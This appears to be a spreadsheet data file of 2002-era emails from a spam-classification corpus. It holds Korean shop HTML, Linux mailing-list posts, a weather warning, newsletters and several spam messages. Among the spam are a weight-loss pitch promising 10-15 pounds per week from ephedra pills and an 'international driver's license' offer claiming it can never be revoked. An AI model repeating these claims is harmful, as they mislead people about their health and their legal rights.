 &lt;tr height=3D10 class=3Dwoong&gt;&lt;td valign=3Dtop align=3Dcenter&gt;41,000=BF=F8=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src=3D"http://www.godsmell.co.kr/shopimages/godsmell/0030310000043.j=
 pg" border=3D0  height=3D100 &gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr height=3D30 class=3Dwoong=
 &gt;&lt;td valign=3Dtop align=3Dcenter&gt;
 &lt;a href=3D"/shop/shopdetail.html?brandcode=3D003031000004" onMouseOver=3D=
 "window.status=3D'=BB=F3=BC=BC=C1=B6=C8=B8';return true; "&gt;
 =BE=C8=B3=AA=BC=F6=C0=CC 30ml&lt;/a&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;tr height=3D10 class=3Dwoong&gt;&lt;td valign=3Dtop align=3Dcenter&gt;25,000=BF=F8=
 &lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;&lt;/table&gt;
 &lt;!-------------=C3=DF=C3=B5 =BB=F3=C7=B0 =B8=AE=BD=BA=C6=AE =B3=A1-------=
 ---------&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;br&gt;
 &lt;font size=3D2&gt;&lt;b&gt;=C8=CE=BE=C0 =B4=F5 =C0=FA=B7=C5=C7=CF=C1=D2?^^"&lt;br&gt;
 =C0=FA=C8=F1 GodSmell=C0=BA =B4=D9=B8=A5 =C7=E2=BC=F6 =BC=EE=C7=CE=B8=F4=B0=
 =FA=B4=C2 =B4=DE=B8=AE =BD=C5=BB=F3=C7=B0=B5=B5 =B8=B9=C0=CC =B1=B8=BA=F1=
 =B5=C7=BE=EE =C0=D6=B4=E4=B4=CF=B4=D9.&lt;br&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;!-------------=B8=F1=B7=CF----------------&gt;
 &lt;table border=3D0 cellpadding=3D0 cellspacing=3D0 width=3D420&gt;
 &lt;tr&gt;&lt;td class=3D'line' height=3D15&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src=3D"http://www.godsmell.co.kr/images/12/maintitle2.gif" b=
 order=3D0 alt=3D"=C3=DF=C3=B5=BB=F3=C7=B0=C0=D4=B4=CF=B4=D9"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td class=3D'line' height=3D10&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table border=3D0 cellpadding=3D0 cellspacing=3D0 width=3D420&gt;
 &lt;td align=3Dcenter class=3Dlims width=3D105 valign=3Dtop&gt;
 &lt;table border=3D0 cellpadding=3D0 cellspacing=3D0 width=3D100 height=3D80=
 &gt;&lt;tr&gt;&lt;td align=3Dcenter height=3D100&gt;
 &lt;a href=3D"http://www.godsmell.co.kr" target=3D"_blank" &gt;
 &lt;img src=3D"http://www.godsmell.co.kr/shopimages/godsmell/0030540000093.j=
 pg" border=3D0  width=3D100 &gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr height=3D30 class=3Dwoong&gt;=
 &lt;td valign=3Dtop align=3Dcenter&gt;
 &lt;a href=3D"/shop/shopdetail.html?brandcode=3D003054000009" onMouseOver=3D=
 "window.status=3D'=BB=F3=BC=BC=C1=B6=C8=B8';return true; "&gt;
 =BF=EF=C6=AE=B6=F3=B9=D9=C0=CC=BF=C3=B7=BF =BE=C6=C4=ED=BE=C6=C6=BD =C7=C3=
 =B6=F3=BD=BA=C6=BD(2002=C7=D1=C1=A4) 80ml&lt;/a&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;tr height=3D10 class=3Dwoong&gt;&lt;td valign=3Dtop align=3Dcenter&gt;35,000=BF=F8=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src=3D"http://www.godsmell.co.kr/shopimages/godsmell/0030360000043.j=
 pg" border=3D0  height=3D100 &gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr height=3D30 class=3Dwoong=
 &gt;&lt;td valign=3Dtop align=3Dcenter&gt;
 &lt;a href=3D"/shop/shopdetail.html?brandcode=3D003036000004" onMouseOver=3D=
 "window.status=3D'=BB=F3=BC=BC=C1=B6=C8=B8';return true; "&gt;
 =B5=F0=BE=EE =BF=A1=BD=BA=BB=DA=BE=C6 =BF=C8=B9=C7 50ml&lt;/a&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;tr height=3D10 class=3Dwoong&gt;&lt;td valign=3Dtop align=3Dcenter&gt;30,000=BF=F8=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src=3D"http://www.godsmell.co.kr/shopimages/godsmell/0030010000183.j=
 pg" border=3D0  width=3D100 &gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr height=3D30 class=3Dwoong&gt;=
 &lt;td valign=3Dtop align=3Dcenter&gt;
 &lt;a href=3D"/shop/shopdetail.html?brandcode=3D003001000018" onMouseOver=3D=
 "window.status=3D'=BB=F3=BC=BC=C1=B6=C8=B8';return true; "&gt;
 =B4=BA =B4=EB=B3=AA=B9=AB =B0=D5=C1=B6 30ml&lt;/a&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;tr height=3D10 class=3Dwoong&gt;&lt;td valign=3Dtop align=3Dcenter&gt;27,000=BF=F8=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src=3D"http://www.godsmell.co.kr/shopimages/godsmell/0030360000053.j=
 pg" border=3D0  height=3D100 &gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr height=3D30 class=3Dwoong=
 &gt;&lt;td valign=3Dtop align=3Dcenter&gt;
 &lt;a href=3D"/shop/shopdetail.html?brandcode=3D003036000005" onMouseOver=3D=
 "window.status=3D'=BB=F3=BC=BC=C1=B6=C8=B8';return true; "&gt;
 =B5=F0=BE=EE =BF=A1=BD=BA=BB=DA=BE=C6 30ml&lt;/a&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;tr height=3D10 class=3Dwoong&gt;&lt;td valign=3Dtop align=3Dcenter&gt;27,000=BF=F8=
 &lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;/td&gt;
 &lt;/tr&gt;&lt;tr&gt;&lt;td colspan=3D7 class=3D'line' height=3D5&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;
 &lt;td align=3Dcenter class=3Dlims width=3D105 valign=3Dtop&gt;
 &lt;table border=3D0 cellpadding=3D0 cellspacing=3D0 width=3D100 height=3D80=
 &gt;&lt;tr&gt;&lt;td align=3Dcenter height=3D100&gt;
 &lt;a href=3D"http://www.godsmell.co.kr" target=3D"_blank" &gt;
 &lt;img src=3D"http://www.godsmell.co.kr/shopimages/godsmell/0030240000093.j=
 pg" border=3D0  width=3D100 &gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr height=3D30 class=3Dwoong&gt;=
 &lt;td valign=3Dtop align=3Dcenter&gt;
 &lt;a href=3D"/shop/shopdetail.html?brandcode=3D003024000009" onMouseOver=3D=
 "window.status=3D'=BB=F3=BC=BC=C1=B6=C8=B8';return true; "&gt;
 =B4=DE=B8=AE =BD=BA=C5=B8=C0=CF 30ml&lt;/a&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;tr height=3D10 class=3Dwoong&gt;&lt;td valign=3Dtop align=3Dcenter&gt;24,000=BF=F8=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src=3D"http://www.godsmell.co.kr/shopimages/godsmell/0120010000423.j=
 pg" border=3D0  height=3D100 &gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr height=3D30 class=3Dwoong=
 &gt;&lt;td valign=3Dtop align=3Dcenter&gt;
 &lt;a href=3D"/shop/shopdetail.html?brandcode=3D012001000042" onMouseOver=3D=
 "window.status=3D'=BB=F3=BC=BC=C1=B6=C8=B8';return true; "&gt;
 =C0=E7=B1=D4=BE=EE 40ml&lt;/a&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;tr height=3D10 class=3Dwoong&gt;&lt;td valign=3Dtop align=3Dcenter&gt;30,000=BF=F8=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src=3D"http://www.godsmell.co.kr/shopimages/godsmell/0120010000333.j=
 pg" border=3D0  width=3D100 &gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr height=3D30 class=3Dwoong&gt;=
 &lt;td valign=3Dtop align=3Dcenter&gt;
 &lt;a href=3D"/shop/shopdetail.html?brandcode=3D012001000033" onMouseOver=3D=
 "window.status=3D'=BB=F3=BC=BC=C1=B6=C8=B8';return true; "&gt;
 =BF=EF=C6=AE=B6=F3 =B9=D9=C0=CC=BF=C3=B7=BF =C6=F7=B8=C7 50ml&lt;/a&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;tr height=3D10 class=3Dwoong&gt;&lt;td valign=3Dtop align=3Dcenter&gt;30,000=BF=F8=
 &lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;/td&gt;
 &lt;td class=3D"line"&gt;&lt;img src=3D"http://www.godsmell.co.kr/images/01/mk_mai=
 n_p_line.gif" border=3D0 width=3D4 height=3D100&gt;
 &lt;/td&gt;
 &lt;td align=3Dcenter class=3Dlims width=3D105 valign=3Dtop&gt;
 &lt;table border=3D0 cellpadding=3D0 cellspacing=3D0 width=3D100 height=3D80=
 &gt;&lt;tr&gt;&lt;td align=3Dcenter height=3D100&gt;
 &lt;a href=3D"http://www.godsmell.co.kr" target=3D"_blank" &gt;
 &lt;img src=3D"http://www.godsmell.co.kr/shopimages/godsmell/0120010000083.g=
 if" border=3D0  width=3D100 &gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr height=3D30 class=3Dwoong&gt;=
 &lt;td valign=3Dtop align=3Dcenter&gt;
 &lt;a href=3D"/shop/shopdetail.html?brandcode=3D012001000008" onMouseOver=3D=
 "window.status=3D'=BB=F3=BC=BC=C1=B6=C8=B8';return true; "&gt;
 =BF=C0=C0=CF=B8=B1=B8=AE 30ml&lt;/a&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;tr height=3D10 class=3Dwoong&gt;&lt;td valign=3Dtop align=3Dcenter&gt;21,000=BF=F8=
 &lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;!------------- =B8=F1=B7=CF =B3=A1 --------------------&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;font size=3D2&gt;&lt;b&gt;=C0=FA=C8=F1 GodSmell=C0=BA =BB=E7=C0=BA=C7=B0=B5=B5 =BE=
 =C6=C1=D6 =C7=AA=C1=FC=C7=CF=B4=E4=B4=CF=B4=D9.&lt;br&gt;
 =BE=EE=BC=AD =BB=A1=B8=AE =BC=EE=C7=CE=C0=C7 =C1=F1=B0=C5=BF=F2=C0=BB =B8=
 =B8=B3=A3=C7=CF=BC=BC=BF=E4~!^^"&lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 *******=BB=F3=C7=B0=C0=BB =C5=AC=B8=AF=C7=CF=BD=C3=B8=E9 GodSmell=B7=CE =C0=
 =CC=B5=BF=C7=D5=B4=CF=B4=D9!^^"*******&lt;br&gt;&lt;br&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 Copyright =A8=CF =B0=AB=BD=BA=B8=E1=C7=E2=BC=F6 All Rights Reserved. 019-=
 476-9314&lt;br&gt;
 =BB=F3=C8=A3=B8=ED : GODSMELL   =BB=E7=BE=F7=C0=DA=B5=EE=B7=CF=B9=F8=C8=A3=
  : 206-11-48025   =B4=EB=C7=A5 : =C7=D1=B1=D4=BD=C4 &lt;br&gt;
 =BB=E7=BE=F7=C0=E5=BC=D2=C0=E7=C1=F6 : =BC=AD=BF=EF=BD=C3 =BC=BA=B5=BF=B1=
 =B8 =C7=E0=B4=E71=B5=BF 286-23 =C1=A4=BF=EC=BA=F4=B5=F9 305=C8=A3 &lt;br&gt;
 &lt;HR color=3D#8bb5e2&gt;
 &lt;DIV align=3Dcenter&gt;
 &lt;FONT face=3D=B1=BC=B8=B2 size=3D2 color=3D#8bb5e2&gt;=BA=BB =B8=DE=C0=CF=C0=
 =BA =C1=A4=BA=B8=C5=EB=BD=C5=BA=CE =B1=C7=B0=ED =BB=E7=C7=D7=BF=A1 =C0=C7=
 =B0=C5
 =C1=A6=B8=F1=BF=A1 [=B1=A4=B0=ED]=B6=F3 =C7=A5=BD=C3=B5=C8 =B1=A4=B0=ED =B8=
 =DE=C0=CF=C0=D4=B4=CF=B4=D9.&lt;/FONT&gt;&lt;BR&gt;
 &lt;A style=3D"PADDING-RIGHT: 3px; PADDING-LEFT: 3px; FONT-SIZE: 12px;
 PADDING-BOTTOM: 3px; COLOR: #ffff00; PADDING-TOP: 3px; FONT-FAMILY: =B1=BC=
 =B8=B2;
 BACKGROUND-COLOR: #8bb5e2; TEXT-DECORATION: none"&gt;
 &lt;A href=3D"
 mailto:fm21c@dreamwiz.com?subject=3D=BC=F6=BD=C5=B0=C5=BA=CE&amp;Body=3D=B8=DE=
 =C0=CF=BC=F6=BD=C5=C0=BB =BF=F8=C4=A1=BE=CA=BD=C0=B4=CF=B4=D9"&gt;=BC=F6=BD=C5=
 =B0=C5=BA=CE&lt;/A&gt;
 &lt;FONT color=3D#8bb5e2  size=3D2 color=3D#8bb5e2&gt;=B9=F6=C6=B0=C0=BB =C5=AC=
 =B8=AF=C7=CF=BD=C3=B8=E9 =BC=F6=BD=C5=B0=C5=BA=CE=C3=B3=B8=AE=B0=A1 =C0=CC=
 =B7=E7=BE=EE =C1=FD=B4=CF=B4=D9.&lt;/FONT&gt;
 &lt;/DIV&gt;
 &lt;HR color=3D#8bb5e2&gt;
 &lt;P align=3Dcenter&gt;
 &lt;map name=3D"Map"&gt;&lt;A href=3D"
 mailto:fm21c@dreamwiz.com?subject=3D=BC=F6=BD=C5=B0=C5=BA=CE&amp;Body=3D=B8=DE=
 =C0=CF=BC=F6=BD=C5=C0=BB =BF=F8=C4=A1=BE=CA=BD=C0=B4=CF=B4=D9"&gt;The certai=
 nly big
 help is will become firm belief like this to send the mail to the minutes
 when, our services use the transactions the at the electron it
 gives.&amp;nbsp;&amp;nbsp; To the minutes when it refuses the mail reception the =
 toil
 which stands it is but it will grow a reception refusal, when lik it does=
 , it
 will eliminate you mail from our data immediately and it will give. the v=
 ery last on push
 &lt;area shape=3D"RECT" coords=3D"412,249,574,381" href=3D"http://www.godsme=
 ll.co.kr" target=3D"_blank"&gt;&lt;/A&gt;
 &lt;/map&gt;&lt;/P&gt;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</si>
  <si>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let me help you
</t>
  </si>
  <si>
    <t xml:space="preserve">Hey there,
 If you're like me, you've tried EVERYTHING to lose
 weight.  I know how you feel - the special diets,
 miracle pills, and fancy exercise equipment never helped
 me lose a pound either.  It seemed like the harder I tried,
 the bigger I got, until I heard about a product called
 Extreme Power Plus.
 You're probably thinking to yourself, "Oh geez, not another
 miracle diet pill!"  Like you, I was skeptical at first, but 
 my sister swore it helped her lose 23 pounds in just two weeks, 
 so I told her I'd give it a shot.  I mean, there was nothing 
 to lose except a lot of weight!  Let me tell you, it was
 the best decision I've ever made. Period.  Six months later,
 as I'm writing this message to you, I've gone from 355 pounds
 to 210 pounds, and I haven't changed my exercise routine or diet
 at all.  Yes, I still eat pizza, and lots of it!
 I was so happy with the results that I contacted the manufacturer
 and got permission to resell it - at a BIG discount.  I want
 to help other people lose weight like I did, because it
 does so much for your self-esteem, not to mention your health.
 I give you my personal pledge that Extreme Power Plus
 absolutely WILL WORK FOR YOU.  If it doesn't, you can return it
 any time for a full refund.    
 If you are frustrated with trying other products, not having 
 any success, and just not getting the results you were promised,
 then I recommend the only product that worked for me - EXTREME
 POWER PLUS.
 You're probably asking yourself, "Ok, so how does this stuff
 actually work?"
 Extreme Power Plus contains Lipotropic fat burners and ephedra which 
 is scientifically proven to increase metabolism and cause rapid 
 weight loss. No "hocus pocus" in these pills - just RESULTS, RESULTS, 
 RESULTS!! 
 Here is the bottom line ...
 I can help you lose 10-15 pounds per week naturally, without
 exercising and without having to eat rice cakes all day.  
 Just try it for one month - there's nothing to lose, and everything 
 to gain.  You will lose weight fast - GUARANTEED.  That is my
 pledge to you.  
 To order Extreme Power Plus on our secure server, just click
 on the link below:
 http://tv-discounters.com/extremeorderc13.htm
 If you have difficulty accessing the website above, please
 try our mirror site by clicking on the link below:
 http://www.tv-discounters.com/extremeorderc13.htm
 To see what some of our customers have said about this product, 
 visit http://tv-discounters.com/testimonials.htm
 To see a list of ingredients and for more information
 on test studies and how it will help you lose weight, visit 
 http://tv-discounters.com/howitworks.htm
 *************************************************************
 If you do not wish to receive any more emails from me, please 
 send an email to "affiliate5@btamail.net.cn" requesting to be 
 removed.
 *************************************************************
 8354piYk6-984bbkK1503WDUz9-372KLvP5598wWyb0-379vwvS6145RbWd9-319QSJv4557l68
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] extending a HAN with Wireless..
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello Justin
 The simplest setup would be to connect a wireless access point to you
 hub then use a wireless pcmcia network card in your laptop.  You could
 also get some pcmcia to pci adapters or wireless pci network cards for
 your desktop machines.
 The access point would be configured with a network name (essid) and a
 channel number for you wireless network.  The client machine would be
 configured with the same network name, it should be able to auto detect
 the channel number.
 Driver support is very good, there are only a few wireless chipsets,
 and I believe that all but the newest 802.11b Plus (22Mbps) and 802.11a
 hardware has Linux drivers.
 If you need anymore help or info checkout the forums and irc channel at
 &lt;URL:http://www.irishwan.org/&gt;.
 Robert Fitzsimons
 robfitz@273k.net
 On Fri, Aug 16, 2002 at 05:39:21PM +0100, Justin MacCarthy wrote:
 &gt; I have a small network at home,
 &gt; 
 &gt; Connected by 5 port hub....
 &gt; "smoothwall" smoothwall server  	192.168.1.1
 &gt; "shaftoe" 	Windows 2000		192.168.1.75
 &gt; "gotodengo"	Linux				192.168.1.50
 &gt; 
 &gt; 
 &gt; The family has a new pc I want to plug in, to use the ISDN in smoothwall.
 &gt; I also have a notebook.
 &gt; 
 &gt; 
 &gt; I want to plug both of these into the network using a wireless connection.
 &gt; What's the best way to do this??? I need to plug a wireless hub into my 5
 &gt; port hub; right? What wireless hardware is good for both Linux &amp; windows???
 &gt; I'm know very little about wireless...
 &gt; 
 &gt; Thanks
 &gt; 
 &gt; Justin
 &gt; 
 &gt; 
 &gt; 
 &gt; 
 &gt; 
 &gt; -- 
 &gt; Irish Linux Users' Group: ilug@linux.ie
 &gt; http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 &gt; List maintainer: listmaster@linux.ie
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: SEVERE THUNDERSTORM WARNING UNTIL THU AUG 15 2002 05:45 PM EDT FOR 12144
</t>
  </si>
  <si>
    <t xml:space="preserve">----------
 If your day starts with a tee time, then visit our Golf Section. weather.com
 http://www.weather.com/RealMedia/ads/click_lx.ads/email.weather.com/email/1524095381/PageSpon/New_Media_twc_email_spon3_text/email_text_01_0713.html/34316434343763383364356332313130?_RM_REDIR_=www.weather.com/outlook/recreation/golf
 ----------
 SEVERE THUNDERSTORM WARNING NATIONAL WEATHER SERVICE ALBANY NY 518 PM EDT THU AUG 15 2002 
 THE NATIONAL WEATHER SERVICE IN ALBANY HAS ISSUED A 
 * SEVERE THUNDERSTORM WARNING FOR...   CENTRAL RENSSELAER COUNTY IN EASTERN NEW YORK 
 * UNTIL 545 PM EDT 
 * AT 514 PM EDT...NATIONAL WEATHER SERVICE DOPPLER RADAR INDICATED A   SEVERE THUNDERSTORM NEAR WYNANTSKILL...OR ABOUT 3 MILES EAST OF   TROY...MOVING EAST AT 15 MPH. 
 * THE SEVERE THUNDERSTORM WILL BE NEAR...   AVERILL PARK AND RAYMERTOWN AT 525 PM EDT   GRAFTON AND BERLIN AT 545 PM EDT 
 THIS IS A DANGEROUS STORM. IF YOU ARE IN ITS PATH YOU SHOULD PREPARE FOR DAMAGING WINDS IN EXCESS OF 55 MPH...LARGE HAIL...AND VERY HEAVY RAIN. PEOPLE OUTSIDE SHOULD MOVE TO A SUBSTANTIAL SHELTER NOW. 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Get your your license
</t>
  </si>
  <si>
    <t xml:space="preserve">INTERNATIONAL DRIVER'S LICENSE
 Need a new driver's license?
 Too many points or other trouble?
 Want a license that can never be suspended
 or revoked?
 Want an ID for nightclubs or hotel check-in?
 Avoid tickets, fines, and mandatory driver's
 education.
 Protect your privacy, and hide your identity.
 The United Nations gave you the privilege to
 drive freely throughout the world! (Convention
 on International Road Traffic of September 19,
 1949 &amp; World Court Decision, The Hague,
 Netherlands, January 21, 1958)
 Take advantage of your rights. Order a valid
 International Driver's License that can never
 be suspended or revoked.
 Confidentiality assured.
 CALL NOW!!!
 1-770-908-3949 
 We await your call seven days a week, 24 hours a day,
 including Sundays and holidays.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Are your loved ones provided for?...            TSOOB
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;center&gt;
 &lt;font face=3D"times" size=3D"6" color=3D"#000000"&gt;Save up to
 &lt;font color=3D"#ff0000"&gt;75%&lt;/font&gt; on your Term Life
 Insurance!&lt;/font&gt;
 &lt;br&gt;  
 &lt;font face=3D"times" size=3D"4" color=3D"#000000"&gt;
 &lt;i&gt;Compare rates from top insurance companies around
 the country&lt;/i&gt;&lt;/font&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;font face=3D"arial" size=3D"4" color=3D"#7084D6"&gt;
 &lt;b&gt;In our life and times, it's important to plan for
 your family's future, while 
 &lt;br&gt;being comfortable financially.  Choose the right
 Life Insurance policy today.&lt;/font&gt;
 &lt;p&gt;
 &lt;font face=3D"arial" size=3D"3" color=3D"#000000"&gt;
 &lt;i&gt;Click the link below to compare the lowest rates
 and save up to &lt;font
 color=3D"#ff0000"&gt;75%&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;&lt;/font&gt;  
 &lt;p&gt;
 &lt;a
 href=3D"http://213.139.76.142/lx/termquotes/473400/"&gt;&lt;font
 face=3D"arial"
 size=3D"4"&gt;
 &lt;b&gt;COMPARE YOUR COVERAGE&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;
 &lt;p&gt;
 &lt;font face=3D"times" size=3D"5" color=3D"#000000"&gt;
 You'll be able to compare rates and get a free
 application in &lt;i&gt;less than a minute!&lt;/i&gt;&lt;/font&gt;
 &lt;p&gt;
 &lt;font face=3D"arial" size=3D"5" color=3D"#ff0000"&gt;
 &lt;b&gt;*Get your FREE instant quotes...&lt;br&gt;
 *Compare the lowest prices, then...&lt;br&gt;
 *Select a company and Apply Online.&lt;/b&gt;&lt;/font&gt;
 &lt;p&gt;
 &lt;a
 href=3D"http://213.139.76.142/lx/termquotes/473400/"&gt;&lt;font
 face=3D"arial"
 size=3D"5"&gt;
 &lt;b&gt;GET A FREE QUOTE NOW!&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;
 &lt;br&gt;
 &lt;font face=3D"arial" size=3D"2" color=3D"#000000"&gt;
 &lt;i&gt;You can't predict the future, but you can always
 prepare for it.&lt;/i&gt;&lt;/font&gt;
 &lt;/center&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 kryder
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] Tracking NFS users
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Lets say we have an nfs server with nfsd running really high load. nfsstat
 will tell you roughly how much traffic is going through with access,
 getattr with either client or server but it won't tell you who is doing
 it. Is there any way on server side to determine what client is causing
 the most usage, and on the client side, is there a way to determine which
 process?
 -- 
 Mel Gorman
 MSc Student, University of Limerick
 http://www.csn.ul.ie/~mel
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On 29 Jul 2002, James Rogers wrote:
 &gt; On Mon, 2002-07-29 at 06:36, Russell Turpin wrote:
 &gt; &gt;
 &gt; &gt; Now yeah, creditors are left holding the bag when a
 &gt; &gt; company goes bankrupt.
 &gt;
 &gt;
 &gt; In my experience, it is the shareholders who are left holding the bag.
 Yes, the current ones, but rarely if ever the original ones. Mom and pop
 investor get screwed, while the originals have inside info and have cashed
 it all or enough out to not care anymore.
 As for the rules for a corp being different then for people, why do you
 think we HAVE corporations? Tax benefits, liability benefits, and the ever
 popular &lt;bart&gt;i didn't do it&lt;/bart&gt;. If everything can be blamed on a
 virtual "thing" then noone has to worry about having their $100M home in
 florida taken away :)
 Of course if you read the story on VCs posted earlier, you dont have to
 worry about corporations happening so much anymore. The old boys network saw
 they let things get a bit out of control, all those geeks having money, and
 are definately making sure the money all stays in the family from now on.
 - Adam L. "Duncan" Beberg
   http://www.mithral.com/~beberg/
   beberg@mithral.com
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sun, 2002-07-21 at 09:11, Brian Fahrlander wrote:
 &gt;
 &gt;     Server problems? Or is this a way to limit bandwidth?
 "Captain, I sense a need to mirror...."   :-)
 If I wasn't on DSL I would.
 			-Chris
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: NEWS.COM INVESTOR: Techs slump with Intel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</si>
  <si>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href="http://clickthru.online.com/Click?q=6c-SUL3IuPjQQ-38MbKQCL5-NPyEdsR"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href="http://clickthru.online.com/Click?q=81-z1IaQ-KB8dmauj7pqfRO9R6BpKlR" &gt;My Portfolio&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &amp;#149; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=96-pjdWQtduIRbnk8ZjZWSoS2P4Jm4R" &gt;Broker Reports&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &amp;#149; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=ab-ZcQKQYpdiyXIeMcXydit0M-0OvrR" &gt;IPOs&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &amp;#149; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=c0-kfs-QWP2dMnrXSV41H99K8FZuSiR" &gt;Splits&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &amp;#149; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=d5-p-viQzL1GR36b2qHCu4jNix1DPPR" &gt;Messages&lt;/a&gt;&lt;/b&gt;
 &lt;/font&gt;
 &lt;!-- /nav --&gt;
 &lt;p&gt;
 &lt;!-- tech winners --&gt;
 &lt;img src="http://www.cnet.com/i/nl/inv/rhc_win.gif" width=160 height=20 alt="Tech Winners"&gt;&lt;br&gt;
 &lt;table width=160 cellpadding=0 cellspacing=0 border=0&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_up.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=ea-fjLyQhV4XV2aQHSAwQ4lAUw-5WnR" &gt;NXTP&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;4.42&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#009933&gt;36.42%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_up.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=00-4FQlI9QkZja8L3ibgi4cHr7W6TiR" &gt;NXTL&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;6.53&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#009933&gt;30.60%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_up.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=15-mYP_IGck2jpiJCCAV-hDEc2lRbPR" &gt;GENU&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;2.77&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#009933&gt;28.84%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_up.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
